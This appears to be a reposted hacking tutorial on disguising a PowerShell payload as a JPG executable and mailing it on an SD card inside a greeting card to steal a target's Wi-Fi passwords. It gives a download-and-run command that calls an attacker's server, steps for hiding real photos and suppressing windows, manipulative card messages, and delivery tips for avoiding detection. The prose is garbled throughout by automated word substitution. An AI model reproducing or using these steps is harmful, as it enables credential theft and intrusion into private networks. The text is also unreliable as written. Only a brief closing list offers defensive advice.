from the previous article, we learned how to set up our VPS, configure our PHP server, in addition to developed an in-depth understanding of how the payload works. With all that will taken care of, we can get into disguising our payload to appear as an image in addition to crafting the note from the greeting card being delivered to our intended target.
To elaborate slightly, we’ll convert the “Stage 1” payload we learned about last time into an executable in addition to modify its icon to make the idea appear to be a normal JPG image. With that will out of way, the only thing left to do is usually put an enticing note from the greeting card in addition to send the idea out along with the SD card or USB flash drive. After that will, we just sit back in addition to relax in addition to wait for the information to hit our PHP server.
As always, we’ll include a section at the end of that will guide on how you can lessen your chances of falling victim to a Wi-Fi attack like that will. We’re not black hats, after all, in addition to that will hack is usually just an exercise to help develop our pentesting in addition to/or white hat skills, in addition to to help educate the general public about hacks that will can affect them.
Step 1: Find Photos for the Storage Device
We’ll need to populate the SD card (or USB drive) with at least one real photo to make that will attack work. Clicking on one payload executable will open one real photo on the SD card, in addition to stealthfully grabbing Wi-Fi passwords, generating sure that will the idea looks like the executable itself is usually that will photo.
the idea will be possible to have multiple real photos on the SD card in addition to have each payload open a different photo. that will will help disguise the attack in addition to prevent the target user by being suspicious of “photos” that will don’t actually open.
Depending on what social engineering angle you take when writing a message from the card, these images can be random vacation photos, adorable puppies, or photos of a person you believe the target will find attractive.
Whatever you choose, make sure the images are perfectly even squares in addition to as large as possible. Ideally, an image with the aspect ratio of over 720 x 720, like the square images found on Instagram, will create a perfect icon file. Any uneven or modest aspect ratios will cause the icon file to appear with an unusual amount of whitespace around the icon in addition to may cause your attack to fail.
I’ll use just one photo of a fat cat, yet you can do that will with as many different photos as you like. The more photo/payload pairs you create, the more likely the target will become curious in addition to begin clicking on files.
Step 2: Save the Photos to the Storage Device
Once you’ve found a photo you want to use, save the idea to the SD card (or USB flash drive). Doing the idea that will way will intersperse real photos with our payloads, yet that will will result in duplicate photos showing up — the real photo in addition to our fake photo with the payload.
Ideally, hide the real photo(s) on the storage device. Windows doesn’t display hidden files by default, so there’s a Great chance your target will not be able to see any files you hide on the device. the idea might be beneficial to hide the real photos in addition to make only payloads accessible to the target.
To hide photos using Windows, right-click on the photo, view the “Properties,” then check the “Hidden” attribute followed by “OK.”
Step 3: Convert the Payload Photo into ICO Format
right now that will we have a least one image, we can convert the JPG into an ICO format. ICO is usually an icon file format used by the Windows operating system to display modest icon images. To do the conversion, I recommend using ICO Converter online.
After navigating to the ICO converter website, click the “Browse” button to select the photo you wish to convert in addition to be sure to check all of the size (pixels) options available. If you don’t check all of them, there’s a chance the ICO produced will have an unnecessary amount of whitespace around the icon in addition to cause the image to appear malformed.
Then, click the “Convert” button. After a moment, you’ll be asked to save the brand-new ICO. Save the idea to the Downloads folder on your computer — don’t save the idea to the SD card accidentally. We still have to build the PowerShell script into an executable payload that will will use that will brand-new icon image as well as the photo already on the storage device.
Step 4: Install a BAT to EXE Converter
To convert PowerShell scripts into executables, we’ll be using a Windows program called BAT to EXE Converter (B2E), which will also allow us to change the icon of the executable to make the idea appear as an image file.
I urge readers to use B2E in an offline, sandboxed, or disposable Windows OS virtual machine. B2E was flagged by VirusTotal as being a potentially malicious file. There are many virtual Windows machines at my disposal, so I didn’t hesitate to try that will program. in addition to being a determined hacker, I’ll use whatever program necessary to achieve my goal. B2E may be dangerous or harmful to your computer. Install in addition to use with caution.
To install the program, head over to the B2E download page, complete the CAPTCHA, in addition to click the big “Download” button. The F2KO (the developer) website uses a modern CAPTCHA system, which requires you to allow the website temporary use of your computer’s CPU to mine cryptocurrency. The CAPTCHA process will cause your CPU to spike dramatically while the crpyto-miner is usually working. When the B2E download is usually completed, simply close the browser tab to stop the miner.
If you’re not comfortable letting the F2KO website use your CPU in exchange for the B2E software, you can download the B2E .zip by my GitHub page where I’m currently hosting a download mirror.
After acquiring the “Bat_To_Exe_Converter.zip”, open the archive, in addition to click on the “Bat_To_Exe_Converter_(Installer).exe” to start installing B2E. The B2E installer will ask you to select your preferred language, agree to the license agreement, in addition to select an installation destination. Continue clicking “Next” until the installer is usually complete, in addition to B2E will open automatically.
Step 5: Convert the Stage 1 Script to EXE
powershell -ExecutionPolicy Bypass “IEX (brand-new-Object Net.WebClient).DownloadString(‘http://YOUR-VPS-IP-HERE/payload.ps1’);”
Remember to change the “YOUR-VPS-IP-HERE” address to the IP address of your VPS running the PHP server.
Then, click the “Save” button in addition to name the file whatever you like — the idea won’t affect any part of the hack. I’ll name the idea as “tokyoneon.” Check the “Icon” option, select the image ICO we created earlier in Step 3, in addition to use “64 Bit | Window (Invisible)” as the Exe-Format option. The “Invisible” option will prevent any cmd terminals by popping up when files on the SD card (or USB drive) are opened.
Next, click on the “Convert” button to create the executable. You’ll be asked by B2E to select a save destination. Save the newly converted EXE to the SD card (or USB drive), in addition to you’re done!
that will payload will just send a request for our Stage 2 payload located on our PHP server, which will look for the storage device name in addition to the real photo on the storage device, then show them the real photo when clicking the image while sending back their Wi-Fi credentials to us on the server.
Step 6: Pick the Right Greeting Card
There’s a Great chance you’ve needed to purchase a greeting card for a friend, coworker, or relative at some point in your life. Buying a greeting card for your intended target in addition to using the idea to deliver the SD card (or USB drive) in addition to your payload isn’t too different. Ask yourself: what kind of greeting card might they buy for themselves?
There will likely be many greeting card options available to you. The kind of card in addition to note you leave for the intended target will likely rely heavily on your casual day-to-day observations of them.
When you last saw your neighbor, were they out walking their dog? A greeting card covered in impossibly cute puppies might be well suited for them.
is usually your intended target a 25-year-old male who sometimes brings home different girlfriends? A romantic or Valentine’s Day card containing some suggestive text might be a better fit.
Unfortunately, the observations we make of our neighbors will likely be very shallow in addition to we may find ourselves relying on unfair stereotypes. Try to be as observant as possible in addition to choose the greeting card that will will most likely invoke strong feelings of excitement in addition to curiosity in your target.
What’s written on the greeting card needs to be believable enough to seduce the target into wondering what content is usually on the SD card (or USB drive). The writing on the card can be very minimal, just one or two sentences, yet keep in mind how you are planning to send the card later. If you are targeting them directly, use their name yet make sure to do enough research on them to make sure what you say makes sense. If you mention their kid’s name, the idea better be their real kid’s name.
However, you could also try to go the random route, in addition to not mention any names on the card or envelope. They will likely still open the idea, in addition to they might even be more enticed to look into what’s on the storage device. You could also try using the wrong name on the envelope in addition to from the card, yet the idea’s a federal crime to open someone else’s mail, so that will will likely not happen unless they think money is usually from the card.
Below is usually an example intended for a birthday card. If you found that will your target’s birthday is usually coming up or just recently happened, that will will work like a charm, especially if you know their kin’s name, yet if not, the idea’ll be pretty suspicious.
Happy Birthday! Sorry, we couldn’t visit that will year. expect all your bday wishes come true!
P.S. The kids put a little surprise for you on the SD card!
End the card with the remark about the SD card (or USB drive). the idea’s better to be vague in addition to make the content on the storage device a mystery. Let that will be the last thing your target reads generating sure that will the idea’s fresh in their mind when they put the greeting card down.
Below is usually another example probably better suited for the “hopeless romantic” type.
I’m sorry for everything in addition to wish we could be together again. Maybe someday you can forgive me? I put something special for you on the SD card…
The goal is usually to illustrate some interesting or dramatic scenario that will will spark a curious itch in your target’s mind that will can only be satisfied by inserting the SD card into their computer. Maybe Andrew parties a lot in addition to can’t remember whom he brings home at night, so that will might do the trick.
You could also forgo any message from the greeting card, yet that will could warn them to our maneuver. Who gets a greeting card without anything written on the idea?
Step 8: Deliver the Goods
With our VPS hosting our Stage 2 PowerShell payload in addition to PHP server, our greeting card inscribed having a convincing handwritten note, in addition to our SD card (or USB drive) containing the Stage 1 PowerShell payload/s, the idea’s time to put the idea all together in addition to deliver the greeting card to our intended target. We have two options here.
Not using a paid mail service might certainly expedite the process. After all, the idea seems silly to actually mail the package to your target, especially if your target is usually a neighbor from the apartment next door. Just place the envelope above or near the intended target’s mailbox where they’re most likely to see the idea.
However, doing that will is usually dangerous. The package might be clean — too clean. Have you ever received a package from the mail that will wasn’t corroded, dirty, or mishandled? the idea also wouldn’t receive an official stamp by the post office legitimizing its process through the mailing system. Delivering the package like that will will likely arouse suspicion in addition to give your target reason to believe the attacker is usually local in addition to nearby.
To maximize the potential for success, place a postage stamp on the package, drop the idea in a mailbox, in addition to wait 3–10 business days for the idea to be delivered to your target. that will way, the package will be properly processed by the mailing services, stamped, in addition to adequately battered while en route to its destination. The mailman might even hand-deliver the package to the intended target. that will will go a long way in creating a sense of legitimacy.
The major downside to taking that will approach is usually the week you’ll need to wait before the target receives the package. the idea’s riskier, yet be sure not to include a return address on the package. If the package is usually rejected, lost from the mail, or for some reason isn’t able to be delivered to your target, you’ll simply need to count that will as a failed attempt.
When you’re ready to send the package to your targets home, don’t address the package to any one person. Only include the delivery address on the center of the envelope. that will will hopefully arouse curiosity, in addition to the idea’s no crime to open the idea, since in addition to the idea’s a letter addressed to their address with no name. If you performed advanced recon in addition to found out their name in addition to different personal details, the idea’s better to go with the name approach.
Step 9: Find Their Wi-Fi Credentials
having a little luck, your target clicked on a payload. Back on your VPS, a brand-new file containing their Wi-Fi credentials might have been created. SSH back into your VPS in addition to change into the phpServer directory as we did in the first article when testing the PHP server. Use the ls in addition to cat commands to view in addition to read files from the phpServer directory.
No Payload is usually Perfect
that will PowerShell attack isn’t perfect. If the target device is usually using an Ethernet cable to connect to the router, the above PowerShell payload won’t work. If the target device is usually not connected to the internet, there’s no contingency or redundancy built-in to the payload that will forces a connection to the internet; the HTTP request will fail in addition to the Wi-Fi credentials will not reach your VPS. in addition to, of course, if the target inserts the SD card into their digital camera or smartphone, they’ll be able to view hidden photos yet won’t be able to execute the payloads.
the idea’s also worth noting that will every day that will article is usually online, that will attack becomes less in addition to less effective. Thousands of Null Byte readers begin using similar PowerShell payloads in addition to uploading them to virus scanners like VirusTotal, a public database of malware which distributes payloads in addition to detection information to major antivirus companies around the globe. that will is usually harmful to the success of such hacks. that will is usually the cat-in addition to-mouse game hackers play with antivirus software companies.
There may never be a perfect payload for compromising a computer. If you know a more effective payload method than the PowerShell method featured in that will article, feel free to use that will payload with the social engineering greeting card trick.
- Don’t insert strange SD cards or USB flash drives into your computers. the idea seems obvious, yet the idea has to be said. If you find a strange storage device in a public place, on the ground, or even in your bag or home — don’t trust the idea.
- If you truly can’t help yet find out what content is usually on a storage device, use an isolated in addition to offline computer — not your primary or favorite laptop.
- If you’re using Windows, use the “Detailed” format view from the File Manager. that will will display file type information in addition to may help you spot strange or suspicious file types.
- If you’re using Windows OS, make sure file type extensions are not “Hidden”.
- Don’t open packages from the mail that will are not directly addressed to you — no matter how big or modest.
- Share that will article. the idea seems silly, yet public awareness can go a long way. If more people understood how far hackers will go to compromise a wireless network, they might be more suspicious of strange items arriving from the mail.
The Cost of that will Wi-Fi Hack
that will kind of attack is usually by no means a quick solution for compromising someone’s Wi-Fi network. that will hack can take hours to set up in addition to days to go by configuring the server to executing the payload. Only a very patient, methodical, in addition to determined hacker might exercise that will kind of attack. in addition to let’s not forget the financial cost of all of that will.
- VPS: $5
- SD card: $7–$20
- greeting card: $4–$9
- postage: about $2
The moral cost is usually more difficult to gauge. that will article is usually a lot different by different content online you’ll find related to Wi-Fi hacking. Some readers might define that will method as extreme, overkill, invasive, or creepy — in addition to they might be correct. Many social engineering tactics in addition to techniques go far beyond “unethical.” At least right now we know what kinds of devious tricks attackers might use to gain access to our home or work networks in addition to what we can do to better protect ourselves.
I’m curious to know what social engineering tricks readers have to offer. How do you feel about using a greeting card as a payload delivery system? Leave your comments below.
in addition to until next time, you can find me on the darknet.
Don’t Miss: How to Extract Email Addresses by an SMTP Server
Don’t Miss: How to Know if You’ve Been Hacked